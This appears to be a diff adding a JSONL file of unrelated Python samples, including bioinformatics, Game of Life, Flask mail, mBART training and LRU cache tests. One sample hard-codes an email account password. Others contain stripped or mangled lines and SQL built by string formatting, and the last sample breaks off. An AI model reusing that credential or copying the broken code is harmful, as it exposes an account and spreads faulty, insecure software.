diff --git "a/1162.jsonl" "b/1162.jsonl" new file mode 100644--- /dev/null +++ "b/1162.jsonl" @@ -0,0 +1,621 @@ +{"seq_id":"636414414","text":"import os\nimport sys\nfrom Bio.Seq import reverse_complement\n\nmyfasta = open(sys.argv[1], 'r')\n\nfastadict = dict()\n\nfor line in myfasta:\n\tif \">\" in line:\n\t\tfastadict[line.strip().split(' ')[0][1:]] = next(myfasta).strip()\n\n\nmyblast = open(sys.argv[2], 'r')\n\nalreadyseen = []\n\nout = open(sys.argv[3], 'w')\nblastgood = open(sys.argv[4], 'w')\nblastfail = open(sys.argv[5], 'w')\n\nfor line in myblast:\n\tinfo = line.strip().split('\\t')\n\tif info[0] in alreadyseen:\n\t\tcontinue\n\telse:\n\t\tif int(info[8]) > int(info[9]):\n\t\t\toutseq = reverse_complement(fastadict[info[0]])\n\t\t\tstart = int(info[9]) - 1\n\t\t\tend = int(info[8])\n\t\telse:\n\t\t\toutseq = fastadict[info[0]]\n\t\t\tstart = int(info[8]) - 1\n\t\t\tend = int(info[9])\n\n\t\texonstart = int(info[1].split('|')[-2])\n\t\texonend = int(info[1].split('|')[-1])\n\n\t\tif start <= exonstart and end >= exonend:\n\t\t\tout.write('>' + info[0] + '\\n')\n\t\t\tout.write(outseq + '\\n')\n\t\t\tblastgood.write(line)\n\t\telse:\n\t\t\tblastfail.write(line)\n\n\t\talreadyseen.append(info[0])\n\n\t","sub_path":"6blasting/make_final_files.py","file_name":"make_final_files.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"545927854","text":"\"\"\" Conway game of life \"\"\"\nimport random, time, copy\nWIDTH = 60\nHEIGHT = 20\n\n# Create a list of list for the cells: \nnextCells = []\nfor x in range(WIDTH):\n column = [] # Create new column\n for y in range(HEIGHT):\n if (random.randint(0,1) == 0): #Returns an integer equal or higher than 0 and lower or equal to 1\n column.append('#') # Add a living cell if random int is 0\n else:\n column.append(' ')\n nextCells.append(column) # Nextcells is a list of columns\n\n# Main program loop:\nwhile True:\n print('\\n\\n\\n\\n\\n') # Print 5 new lines\n currentCells = copy.deepcopy(nextCells) # Create new reference to cells\n\n # Print current cells on the screen\n for y in range(HEIGHT):\n for x in range(WIDTH):\n print(currentCells[x][y], end='') #Print the # or space\n print()\n\n # Calculate the next step's cell based on current step's cells:\n for x in range(WIDTH):\n for y in range(HEIGHT):\n # Get neighboring coordinates \n # '% WIDTH' ensures leftCoor is always between 0 and width -1 \n\n leftCoord = (x - 1) % WIDTH # If -1, evaluates to 59\n rightCoord = (x + 1) % WIDTH\n aboveCoord = (y - 1) % HEIGHT\n belowCoord = (y + 1) % HEIGHT\n\n # Count number of living neighbords:\n numNeighbors = 0\n if (currentCells[leftCoord][aboveCoord] == '#'):\n numNeighbors += 1 # Top left neighbor is alive\n if (currentCells[x][aboveCoord] == '#'):\n numNeighbors += 1 # Top neighbor is alive\n if (currentCells[rightCoord][aboveCoord] == '#'):\n numNeighbors += 1 # Top right neighbor is alive\n if (currentCells[leftCoord][y] == '#'):\n numNeighbors += 1 # Left neighbor is alive\n if (currentCells[rightCoord][y] == '#'):\n numNeighbors += 1 # Right neighbor is alive\n if (currentCells[leftCoord][belowCoord] == '#'):\n numNeighbors += 1 # Below left neighbor is alive\n if (currentCells[x][belowCoord] == '#'):\n numNeighbors += 1 # Below neighbor is alive\n if (currentCells[rightCoord][belowCoord] == '#'):\n numNeighbors += 1 # Below right neighbor is alive\n \n if (currentCells[x][y] == '#' and (numNeighbors == 2 or numNeighbors == 3)):\n nextCells[x][y] = '#' # Living cells with 2 or 3 neighbors stay alive\n elif (currentCells[x][y] == ' ' and numNeighbors == 3):\n nextCells[x][y] = '#' # Dead cells with 3 neighbors become alive\n else:\n nextCells[x][y] = ' ' # All others become or stay dead\n \n time.sleep(1) # Set a 1 second pause to reduce flickering\n","sub_path":"chapter4/conwayGameOfLife.py","file_name":"conwayGameOfLife.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"571233201","text":"\ndef load_input_array(input_path):\n input_arr = []\n with open(input_path) as f:\n input_arr = map(lambda char: int(char), f.read().split(','))\n return input_arr\n\ninput = load_input_array('input.txt')\n\ndef guess_inputs(original_input):\n target = 19690720\n for noun in range(0,99):\n for verb in range(0,99):\n arr = original_input[:]\n arr[1] = noun\n arr[2] = verb\n i = 0\n while arr[i] != 99:\n if arr[i] == 1:\n arr[arr[i+3]] = arr[arr[i+1]] + arr[arr[i+2]]\n else:\n arr[arr[i+3]] = arr[arr[i+1]] * arr[arr[i+2]]\n i += 4\n if arr[0] == target:\n return (noun, verb)\n\nprint(guess_inputs(input))\n","sub_path":"2/part2.py","file_name":"part2.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"639843242","text":"\"\"\"\nExplore color space and distances.\n\nVersion: 2015may13\n\"\"\"\n\nfrom pylab import * # analysis:ignore\nfrom mpl_toolkits.mplot3d import Axes3D # analysis:ignore\nfrom copy import deepcopy\n\nnpts = 20\nstep = 0.02\nlowerlim = 0\nupperlim = 1\nstart = [0.5, 0.5, 0.5]\neps = 0.01\nmaxsteps = 2000\nndims = 3\nplotevery = 100\n\n\nfig = figure()\nax = fig.add_subplot(111, projection='3d')\ndef plotpoints(points,label):\n ax.cla()\n ax.scatter(points[:,0], points[:,1], points[:,2], c=points, s=200, depthshade=False)\n ax.set_title(label)\n ax.set_xlabel('R')\n ax.set_ylabel('G')\n ax.set_zlabel('B')\n ax.set_xlim((0,1))\n ax.set_ylim((0,1))\n ax.set_zlim((0,1))\n\ndef metric1(points):\n \"\"\" Maximize sum of pairwise distances \"\"\"\n npts = len(points)\n dist = 0\n for p1 in range(npts):\n for p2 in range(npts):\n dist += norm(points[p2]-points[p1])\n return dist\n \ndef metric2(points):\n \"\"\" Maximize minimum distance between 2 points \"\"\"\n npts = len(points)\n totaldist = 0\n for p1 in range(npts):\n thisdist = inf\n for p2 in range(npts):\n if p1!=p2:\n thisdist = minimum(thisdist, norm(points[p2]-points[p1]))\n totaldist += thisdist\n return totaldist\n\npoints = []\nfor p in range(npts):\n points.append(start+eps*(randn(ndims)))\npoints = array(points)\n\n\nfor s in range(maxsteps+1):\n orig = deepcopy(points)\n for dim in range(ndims):\n pert = step*(randn(npts))\n points[:,dim] += pert\n points[points[:,dim]upperlim,dim] = orig[points[:,dim]>upperlim,dim] # Reset points that went too high\n dorig = metric2(orig)\n dnew = metric2(points)\n \n label = 'Step: %i | Original: %0.3f | New: %0.3f' % (s, dorig, dnew)\n print(label)\n if dnew < dorig: points = orig # If distance increases, keep\n if not(s % plotevery): \n plotpoints(points, label)\n pause(0.05)\n \n \nprint('Done.')","sub_path":"general/colorspace.py","file_name":"colorspace.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"297667267","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Flask, render_template\nfrom flask_mail import Mail, Message\nfrom threading import Thread\nimport os\nfrom blog2 import app\n\napp.config['MAIL_SERVER'] = 'smtp-mail.outlook.com' # 邮件服务器地址\napp.config['MAIL_PORT'] = 587 # 邮件服务器端口\napp.config['MAIL_USE_TLS'] = True # 启用 TLS\napp.config['MAIL_USERNAME'] = 'flasktest@outlook.com'\napp.config['MAIL_PASSWORD'] = 'flask2014'\n#app.config['SECURITY_EMAIL_SENDER'] = 'flasktest@outlook.com'\n\nmail = Mail(app)\n\ndef send_async_email(app, msg):\n with app.app_context():\n mail.send(msg)\n\n\ndef send_email(mailcon,content):\n msgcon='
发现 ID: '+str(content.userid)+' 的用户 '+str(content.username)+' 发表的新留言中出现高危敏感词:
'\n for i in mailcon:\n msgcon+=''\n msgcon+='
关键词出现次数
'+str(i['key'])+''+str(i['times'])+'次

请于后台管理系统确认并处理。
'\n msg = Message('Warning:关键词', sender=('ethan', 'flasktest@outlook.com'), recipients=['j.krma@hotmail.com'])\n msg.html = msgcon\n thr = Thread(target=send_async_email, args=[app, msg])\n thr.start()\n return 'send successfully'\n'''\n# 最基本的发送邮件方式\n@app.route('/')\ndef index():\n msg = Message('Hello', sender=('ethan', 'flasktest@outlook.com'), recipients=['j.krma@hotmail.com'])\n # msg.body = 'The first email!'\n msg.html = 'Hello Web'\n mail.send(msg)\n\n return '

OK!

'\n'''\n'''\n# 异步发送邮件\n@app.route('/sync')\ndef send_email():\n msg = Message('Hello', sender=('ethan', 'flasktest@outlook.com'), recipients=['j.krma@hotmail.com'])\n msg.html = 'send email asynchronously'\n thr = Thread(target=send_async_email, args=[app, msg])\n thr.start()\n return 'send successfully'\n\n\n# 邮件带附件\n@app.route('/attach')\ndef add_attchments():\n msg = Message('Hello', sender=('ethan', 'flasktest@outlook.com'), recipients=['j.krma@hotmail.com'])\n msg.html = 'Hello Web'\n\n with app.open_resource(\"/Users/ethan/Documents/pixels.jpg\") as fp:\n msg.attach(\"photo.jpg\", \"image/jpeg\", fp.read())\n\n mail.send(msg)\n return '

OK!

'\n\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1', debug=True)\n '''","sub_path":"CheSongze/Task3/1-3/blog2/controller/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"363879759","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright (c) 2021, Dialobot. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport torch.nn.functional as F\nimport torch\nfrom pytorch_lightning.callbacks.early_stopping import EarlyStopping\nfrom transformers import get_cosine_schedule_with_warmup\nfrom torch.optim.lr_scheduler import LambdaLR\nfrom torch.optim import Optimizer, AdamW\nfrom torch.utils.data import DataLoader\nfrom typing import Dict, Tuple, List\nfrom transformers import MBartForConditionalGeneration, MBart50TokenizerFast\nimport pytorch_lightning as pl\nimport sys\nfrom pytorch_lightning.callbacks import ModelCheckpoint\n\n\nclass BartForSeq2SeqLM(pl.LightningModule):\n def __init__(self, src_lang, tgt_lang):\n super().__init__()\n self.batch_size = 16\n self.lr = 3e-5\n self.src_lang = src_lang\n self.tgt_lang = tgt_lang\n self.model = MBartForConditionalGeneration.from_pretrained(\n \"facebook/mbart-large-en-ro\"\n )\n\n def forward(self, batch):\n model_inputs, labels = batch\n out = self.model(**model_inputs, labels=labels)\n return out\n\n def training_step(self, batch, batch_idx):\n \"\"\"Training steps\"\"\"\n out = self.forward(batch)\n loss = out[\"loss\"]\n self.log(\"train_loss\", loss)\n return loss\n\n @torch.no_grad()\n def validation_step(self, batch, batch_idx) -> Dict:\n \"\"\"Validation steps\"\"\"\n out = self.forward(batch)\n loss = out[\"loss\"]\n self.log('val_loss', loss, on_step=True, prog_bar=True, logger=True)\n return loss\n\n def test_step(self, batch, batch_idx):\n while True:\n user_input = input()\n\n if user_input == \"stop\":\n break\n else:\n inputs = self.tokenizer(user_input, return_tensors=\"pt\")\n translated_tokens = model.generate(\n **inputs,\n decoder_start_token_id=self.tokenizer.lang_code_to_id[self.tgt_lang]\n )\n print(\n self.tokenizer.batch_decode(\n translated_tokens, skip_special_tokens=True\n )[0]\n )\n\n def configure_optimizers(self) -> Tuple[List[Optimizer], List[LambdaLR]]:\n \"\"\"\n Configure optimizers and lr schedulers\n\n Returns:\n (Tuple[List[Optimizer], List[LambdaLR]]): [optimizers], [schedulers]\n \"\"\"\n\n optimizer = AdamW([p for p in self.parameters() if p.requires_grad], lr=self.lr)\n\n return {\"optimizer\": optimizer}\n\n def train_dataloader(self):\n return DataLoader(\n PAWS_X(\"x-final/ko/translated_train.tsv\", \"ko_KR\", \"ko_KR\", 128),\n batch_size=4,\n pin_memory=True,\n num_workers=4,\n shuffle=True,\n )\n\n def val_dataloader(self):\n return DataLoader(\n PAWS_X(\"x-final/ko/dev_2k.tsv\", \"ko_KR\", \"ko_KR\", 128),\n num_workers=4,\n batch_size=4,\n pin_memory=True,\n )\n\n\nif __name__ == \"__main__\":\n # trainer = pl.Trainer(gpus=None)\n trainer = pl.Trainer(\n gpus=1,\n callbacks=[\n EarlyStopping(monitor=\"val_loss\"),\n ModelCheckpoint(\n monitor=\"val_loss\",\n filename=\"paraphrase_mbart_{epoch:02d}-{val_loss:.2f}\",\n save_top_k=1,\n mode=\"min\",\n ),\n ]\n )\n model = BartForSeq2SeqLM(\"ko_KR\", \"ko_KR\")\n trainer.fit(model)\n","sub_path":"gym/models/bart/clone.py","file_name":"clone.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"16306456","text":"from lru_cache import Node, LRUCache\nimport unittest\n\n\nclass TestNode(unittest.TestCase):\n def test_instantiates(self):\n \"\"\"\n Instantiates a new version of Node\n \"\"\"\n node = Node()\n self.assertIsInstance(node, Node)\n\n def test_instantiates_with_default_none(self):\n \"\"\"\n Instantiates with None as default value\n \"\"\"\n node = Node()\n result = node._value\n self.assertEqual(result, None)\n\n def test_get_value_returns_default_none(self):\n \"\"\"\n Returns None if no value has been assigned yet\n \"\"\"\n node = Node()\n result = node.get_value()\n self.assertEqual(result, None)\n\n def test_returns_value_of_node(self):\n \"\"\"\n Returns the value of the node that has been assigned\n \"\"\"\n node = Node(\"test\")\n result = node.get_value()\n self.assertEqual(result, \"test\")\n\n def test_delete_returns_value(self):\n \"\"\"\n Returns the value of the deleted node\n \"\"\"\n node = Node(\"test\")\n result = node.delete()\n self.assertEqual(result, \"test\")\n\n def test_delete_removes_previous_next_ref(self):\n \"\"\"\n Removes the reference to the previous and next nodes\n when deleted\n \"\"\"\n node = Node(\"test\")\n node._next = Node(\"next\")\n node._previous = Node(\"previous\")\n node.delete()\n self.assertEqual(node._next, None)\n self.assertEqual(node._previous, None)\n\n def test_sets_previous_and_next_node_to_each_other(self):\n \"\"\"\n Sets the previous and next node's references to each other\n \"\"\"\n node = Node(\"middle\")\n next = Node(\"next\")\n previous = Node(\"previous\")\n node._next = next\n node._previous = previous\n node.delete()\n self.assertEqual(next._previous, previous)\n self.assertEqual(previous._next, next)\n\n\nclass TestLRUCache(unittest.TestCase):\n def test_instantiates(self):\n \"\"\"\n Instantiates a new version of LRUCache\n \"\"\"\n cache = LRUCache()\n self.assertIsInstance(cache, LRUCache)\n\n def test_records_max_size(self):\n \"\"\"\n Records the correct max size of the cache\n \"\"\"\n cache = LRUCache(10)\n result = cache._max_size\n self.assertEqual(result, 10)\n\n def test_instantiates_with_none_as_default(self):\n \"\"\"\n Instantiates with null as default initial values\n for front and back\n \"\"\"\n cache = LRUCache(100)\n front_value = cache._front\n back_value = cache._back\n self.assertEqual(front_value, None)\n self.assertEqual(back_value, None)\n\n def test_instantiates_with_initial_value(self):\n \"\"\"\n Instantiates with an initial value if a second\n argument is given\n \"\"\"\n cache = LRUCache(10, \"test\")\n front_value = cache._front.get_value()\n back_value = cache._back.get_value()\n self.assertEqual(front_value, \"test\")\n self.assertEqual(back_value, \"test\")\n\n def test_length_returns_0(self):\n \"\"\"\n Returns 0 if no values have been added\n \"\"\"\n cache = LRUCache(10)\n result = cache.length()\n self.assertEqual(result, 0)\n\n def test_returns_correct_length(self):\n \"\"\"\n Returns the correct length of the cache if\n values have been added\n \"\"\"\n cache = LRUCache(1234)\n cache.add_value(\"1\")\n cache.add_value(\"2\")\n cache.add_value(\"3\")\n result = cache.length()\n self.assertEqual(result, 3)\n\n def test_adds_value_to_front_of_cache(self):\n \"\"\"\n Adds a new value to the front of the cache\n \"\"\"\n cache = LRUCache(100)\n cache.add_value(1)\n cache.add_value(2)\n front_value = cache._front.get_value()\n back_value = cache._back.get_value()\n self.assertEqual(front_value, 2)\n self.assertEqual(back_value, 1)\n\n def test_removes_value_at_back_of_cache(self):\n \"\"\"\n Removes a value at the back of the cache if the max\n size has been reached\n \"\"\"\n cache = LRUCache(5)\n for i in range(0, 6):\n cache.add_value(i)\n result = cache._back.get_value()\n self.assertEqual(result, 1)\n\n def test_accesses_value_and_moves_to_front(self):\n \"\"\"\n Moves a value to the front of the cache if it's\n accessed\n \"\"\"\n cache = LRUCache(10, \"first\")\n cache.add_value(\"second\")\n cache.add_value(\"third\")\n cache.access_value(\"first\")\n front_value = cache._front.get_value()\n back_value = cache._back.get_value()\n self.assertEqual(front_value, \"first\")\n self.assertEqual(back_value, \"second\")\n\n def test_returns_true_if_value_found(self):\n \"\"\"\n Returns True if the value is found in the cache\n \"\"\"\n cache = LRUCache(100)\n cache.add_value(\"test\")\n result = cache.access_value(\"test\")\n self.assertEqual(result, True)\n\n def test_returns_false_if_value_not_found(self):\n \"\"\"\n Returns False if the value is not found in the\n cache\n \"\"\"\n cache = LRUCache(100)\n cache.add_value(\"test\")\n result = cache.access_value(\"this value cannot be found\")\n self.assertEqual(result, False)\n\n def test_delete_sets_front_and_back_to_none(self):\n \"\"\"\n Sets front and back references to None\n \"\"\"\n cache = LRUCache(100)\n cache.add_value(1)\n cache.delete_value(1)\n front_value = cache._front\n back_value = cache._back\n self.assertEqual(front_value, None)\n self.assertEqual(back_value, None)\n\n def test_returns_true_if_deleted(self):\n \"\"\"\n Returns True if the value has been deleted\n from the cache\n \"\"\"\n cache = LRUCache(100)\n cache.add_value(1)\n result = cache.delete_value(1)\n self.assertEqual(result, True)\n\n def test_returns_false_if_not_deleted(self):\n \"\"\"\n Returns False if the value is not deleted\n or cannot be found in the cache\n \"\"\"\n cache = LRUCache(10)\n result = cache.delete_value(1)\n self.assertEqual(result, False)\n\n def test_delete_updates_length(self):\n \"\"\"\n Updates the correct length of the cache\n \"\"\"\n cache = LRUCache(10)\n cache.add_value(1)\n before_delete = cache.length()\n cache.delete_value(1)\n after_delete = cache.length()\n self.assertEqual(before_delete, 1)\n self.assertEqual(after_delete, 0)\n\n def test_sets_new_back_correctly(self):\n \"\"\"\n Sets the new back of the cache correctly\n when deleting the back value\n \"\"\"\n cache = LRUCache(10)\n cache.add_value(1)\n cache.add_value(2)\n cache.add_value(3)\n cache.delete_value(1)\n result = cache._back.get_value()\n self.assertEqual(result, 2)\n\n def test_sets_new_front_correctly(self):\n \"\"\"\n Sets the new front of the cache correctly\n when deleting the front value\n \"\"\"\n cache = LRUCache(10)\n cache.add_value(1)\n cache.add_value(2)\n cache.add_value(3)\n cache.delete_value(3)\n result = cache._front.get_value()\n self.assertEqual(result, 2)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"data_structures/cache/least_recently_used/test_lru_cache.py","file_name":"test_lru_cache.py","file_ext":"py","file_size_in_byte":7500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"554195315","text":"from BeautifulSoup import BeautifulSoup, Tag\n\nNEWLINE_TAGS = ['div', 'p'] #'br', \n\n\ndef replace_tags(soup, name, replace):\n for t in soup(name):\n t.replaceWith(replace)\n \n return soup\n\n\n\ndef flatten(soup):\n \n if not hasattr(soup, 'contents'):\n return unicode(soup) \n \n text = u\"\"\n \n for child in soup.contents:\n if isinstance(child, Tag) and child.name in NEWLINE_TAGS:\n text += \"\\n\"\n text += flatten(child)\n\n return text","sub_path":"utils/soupmagic.py","file_name":"soupmagic.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"418156669","text":"\"\"\"\nExample of MPQ agent, dumping data into yaml file, with the environment DeepSeaTreasureRightDownStochastic, specific\nprecision and binary dumps.\n\"\"\"\nimport time\n\nimport yaml\n\nimport utils.miscellaneous as um\nimport utils.models as u_models\nfrom agents import AgentMPQ\nfrom configurations.paths import dumps_path\nfrom environments import Environment, DeepSeaTreasureRightDownStochastic\nfrom models import GraphType, Vector\n\n\ndef dumps(data: dict, columns: int, environment: Environment):\n \"\"\"\n Dumps full_data given into dumps directory\n :param environment:\n :param columns:\n :param data:\n :return:\n \"\"\"\n\n timestamp = int(time.time())\n\n # Get environment name in snake case\n environment = um.str_to_snake_case(environment.__class__.__name__)\n\n # Get only first letter of each word\n env_name_abbr = ''.join([word[0] for word in environment.split('_')])\n\n # Specify full path\n file_path = dumps_path.joinpath(\n 'mpq/train_data/{}_{}_{}_{}.yml'.format(env_name_abbr, timestamp, Vector.decimal_precision, columns)\n )\n\n # If any parents doesn't exist, make it.\n file_path.parent.mkdir(parents=True, exist_ok=True)\n\n with file_path.open(mode='w+', encoding='UTF-8') as f:\n f.write(um.structures_to_yaml(data=data))\n\n\ndef train_from_zero():\n # Define variables\n limit = 500\n epsilon = 0.4\n max_steps = 1000\n alpha = 0.1\n gamma = 1\n graph_type = GraphType.EPISODES\n columns_list = range(1, 4)\n decimals = [0.01, 0.05]\n\n for decimal_precision in decimals:\n\n # Set vector decimal precision\n Vector.set_decimal_precision(decimal_precision=decimal_precision)\n\n for columns in columns_list:\n # Environment\n environment = DeepSeaTreasureRightDownStochastic(columns=columns)\n\n # Create agent\n agent = AgentMPQ(environment=environment, hv_reference=environment.hv_reference, epsilon=epsilon,\n alpha=alpha, gamma=gamma, max_steps=max_steps)\n\n # Time train\n t0 = time.time()\n\n # Show numbers of columns\n print('# of columns: {}'.format(columns))\n\n # Agent training\n agent.train(graph_type=graph_type, limit=limit)\n\n # Calc total time\n total_time = time.time() - t0\n\n prepare_for_dumps(agent, columns, decimal_precision, graph_type, limit, total_time)\n\n\ndef prepare_for_dumps(agent, columns, decimal_precision, graph_type, limit, total_time):\n # Convert to vectors\n vectors = {key: [v.tolist() for v in vectors.values()] for key, vectors in agent.v.items()}\n\n # Prepare full_data to dumps\n data = {\n 'time': total_time,\n 'memory': {\n 'v_s_0': len(agent.v[agent.environment.initial_state]),\n 'full': sum(len(vectors) for vectors in agent.v.values())\n },\n 'vectors': vectors\n }\n\n # Configuration of environment\n environment_info = vars(agent.environment).copy()\n environment_info.pop('_action_space', None)\n environment_info.pop('np_random', None)\n environment_info.update({'columns': columns})\n\n # Configuration of agent\n agent_info = {\n 'alpha': agent.alpha,\n 'gamma': agent.gamma,\n 'epsilon': agent.epsilon,\n 'evaluation_mechanism': str(agent.evaluation_mechanism),\n 'initial_q_value': agent.initial_q_value,\n 'initial_seed': agent.initial_seed,\n 'interval_to_get_data': agent.interval_to_get_data,\n 'max_steps': agent.max_steps,\n 'total_steps': agent.total_steps,\n 'total_episodes': agent.total_episodes,\n 'decimal_precision': decimal_precision,\n 'hv_reference': agent.hv_reference,\n }\n\n training_info = {\n 'graph_type': str(graph_type),\n 'limit': limit\n }\n\n # Extra data\n data.update({'environment': environment_info})\n data.update({'agent': agent_info})\n data.update({'training': training_info})\n\n # Dumps partial execution\n dumps(data=data, columns=columns, environment=agent.environment)\n\n # Dumps model\n agent.save()\n\n\ndef train_from_file():\n # Information files (Specify a existing binary file of this configurations, in my case is are these)\n models_path = 'mpq/models/dstrds_1579869395_1.0_4.bin'\n config_path = 'mpq/train_data/dstrds_1579869395_1.0_4.yml'\n\n agent: AgentMPQ = u_models.binary_load(path=dumps_path.joinpath(\n models_path\n ))\n\n # Data Path\n data_path = dumps_path.joinpath(config_path)\n data_file = data_path.open(mode='r', encoding='UTF-8')\n\n # Load yaml from file\n data = yaml.load(data_file, Loader=yaml.FullLoader)\n\n # Extract relevant data for training\n before_training_execution = float(data['time'])\n decimal_precision = float(data['agent']['decimal_precision'])\n graph_type = GraphType.from_string(data['training']['graph_type'])\n limit = int(data['training']['limit'])\n columns = int(data['environment']['columns'])\n\n # Set decimal precision\n Vector.set_decimal_precision(decimal_precision=decimal_precision)\n\n # Time train\n t0 = time.time()\n\n # Agent training\n agent.train(graph_type=graph_type, limit=limit)\n\n # Calc total time\n total_time = (time.time() - t0) + before_training_execution\n\n prepare_for_dumps(agent, columns, decimal_precision, graph_type, limit, total_time)\n\n\nif __name__ == '__main__':\n train_from_zero()\n # train_from_file()\n","sub_path":"extras/draft_mpq.py","file_name":"draft_mpq.py","file_ext":"py","file_size_in_byte":5459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"547525969","text":"#encoding: utf-8\nfrom OpenOrange import *\nfrom Report import Report\nfrom Label import Label\n\ndef GetItemLabelsTotals(LabelType,FromDate,ToDate):\n Table = {}\n salesq = \"SELECT {ArtCode}, sum({RowTotal}) AS Sales \" \n salesq += \"FROM [InvoiceItemRow] \"\n salesq += \"INNER JOIN [Invoice] ON [Invoice].{internalId} = [InvoiceItemRow].{masterId} \"\n salesq += \"WHERE?AND {TransDate} BETWEEN d|%s| AND d|%s| \" % (FromDate,ToDate) \n salesq += \"GROUP BY {ArtCode} \"\n\n labelq = \"SELECT il.{Value} as Label, i.{Code} \\n\"\n labelq += \"FROM [Label] lab \\n\"\n labelq += \"RIGHT JOIN [ItemLabels] il ON lab.{Code}=il.{Value} \\n\" \n labelq += \"LEFT JOIN [Item] i ON i.{internalId}=il.{masterId} \\n\" \n labelq += \"WHERE?AND lab.{Type}=s|%s| \" % LabelType\n\n query = Query()\n query.sql = \"SELECT t1.{Label}, SUM(t2.{Sales}) AS Total\\n\"\n query.sql += \"FROM (%s) t1 \\n\" % (labelq)\n query.sql += \"LEFT JOIN (%s) t2 ON t2.{ArtCode}=t1.Code\\n\" % salesq\n query.sql += \"GROUP BY t1.{Label}\\n \"\n Table = {}\n if(query.open()):\n message(\"it opens\" + str(query.count()))\n for r in query:\n if r.Total and r.Label:\n Table[r.Code] = r.Sales\n query.close()\n return Table\n\n\nclass ItemTree(Report):\n\n def defaults(self):\n Report.defaults(self)\n specs = self.getRecord()\n specs.startnode = \"TODO\"\n \n def PrintAtLevel(self,Node,level,first):\n if not first:\n self.startRow()\n for i in range(1,level+1):\n self.addValue(\"\")\n self.addValue(Node,CallMethod=\"ZoomIn\", Parameter = Node)\n #self.addValue(\"%s
(%7.0f)\" % (Node,self.Table.get(Node,0)))\n\n def TreeWalk(self,tree,Node,level):\n if tree.has_key(Node):\n firstson = True\n for child in tree[Node]:\n self.PrintAtLevel(child[0],level+1,firstson)\n self.TreeWalk(tree,child[0],level+1)\n firstson = False\n else:\n self.endRow()\n \n def run(self):\n specs = self.getRecord()\n self.printReportTitle(\"Item Tree\")\n if (not self.__dict__.has_key(\"selectedLabel\")):\n self.selectedLabel = None\n if specs.Label:\n self.ItemList(specs.Label,specs.ShowInverse)\n return\n \n self.startTable()\n self.headerA(\"Nivel\")\n self.header(\"0\",\"1\",\"2\",\"3\",\"4\")\n tree = {}\n self.Table = {} #GetItemLabelsTotals(specs.LabelType,specs.FromDate,specs.ToDate)\n query = Query()\n query.sql = \"SELECT {Code},{Name},{Level},{PathToRoot} from [Classification] \\n\" # LO: This is not Label anymore !!! \n query.sql += \"ORDER BY {PathToRoot},{Code} \\n\"\n if(query.open()):\n for r in query:\n if not tree.has_key(r.PathToRoot):\n tree[r.PathToRoot] = []\n tree[r.PathToRoot].append((r.Code,r.Name,r.Level))\n query.close()\n self.startRow()\n self.PrintAtLevel(specs.startnode,0,True)\n self.TreeWalk(tree,specs.startnode,0)\n self.endTable()\n self.startTable()\n self.startRow()\n self.addValue(tr(\"Show Classification Errors\"),CallMethod=\"showNotLabeled\", Parameter = specs.startnode)\n self.endRow()\n self.endTable()\n \n def showNotLabeled(self,param,value):\n specs = self.getRecord()\n report = ItemTree()\n report.defaults()\n report.getRecord().Label = specs.startnode\n report.getRecord().ShowInverse = 1\n report.open(False)\n\n def ZoomIn(self,param,value):\n specs = self.getRecord()\n report = ItemTree()\n report.defaults()\n report.getRecord().Label = param\n report.getRecord().ShowInverse = 0\n report.open(False)\n\n def selectLabel(self,param,value):\n self.clear()\n self.selectedLabel = param\n self.run()\n self.render()\n\n def selectArticle(self,param,value):\n self.clear()\n from Item import Item\n it = Item.bring(param)\n if it:\n it.Labels = self.selectedLabel\n it.store()\n self.run()\n self.render()\n\n\n def printLabelOptions(self,LabelSet):\n self.startTable()\n self.header(\"Label\",\"Name\")\n for lab in LabelSet:\n if (not self.selectedLabel): \n self.selectedLabel = lab\n self.startRow()\n if (self.selectedLabel==lab): \n col = self.LevelCBackColor\n else:\n col = self.LevelABackColor\n self.addValue(lab,CallMethod=\"selectLabel\",Parameter = lab,Color = col)\n self.addValue(\"\")\n self.endRow()\n self.row()\n self.endTable()\n\n\n def ItemList(self,Node,Inverse):\n labset = Label.getTreeLeaves(Node)\n if Inverse:\n self.printLabelOptions(labset)\n import string\n query = Query()\n query.sql = \"SELECT Code AS ArtCode, Name AS ArtName,Classification,Price \"\n query.sql += \"FROM [Item] \"\n if Inverse:\n query.sql += \"WHERE?AND Classification NOT IN ('%s') \" % \"','\".join(labset)\n else: \n query.sql += \"WHERE?AND Classification IN ('%s') \" % \"','\".join(labset)\n query.sql += \"WHERE?AND ({Closed} IS NULL or {Closed} = 0)\\n\" \n query.sql += \"ORDER BY {Code} \"\n if(query.open()):\n self.startTable()\n self.header(\"Code\",\"Name\",\"Label\",\"Price\")\n for r in query:\n self.startRow()\n self.addValue(r.ArtCode,Window=\"ItemWindow\", FieldName=\"Code\")\n self.addValue(r.ArtName,CallMethod=\"selectArticle\",Parameter = r.ArtCode)\n 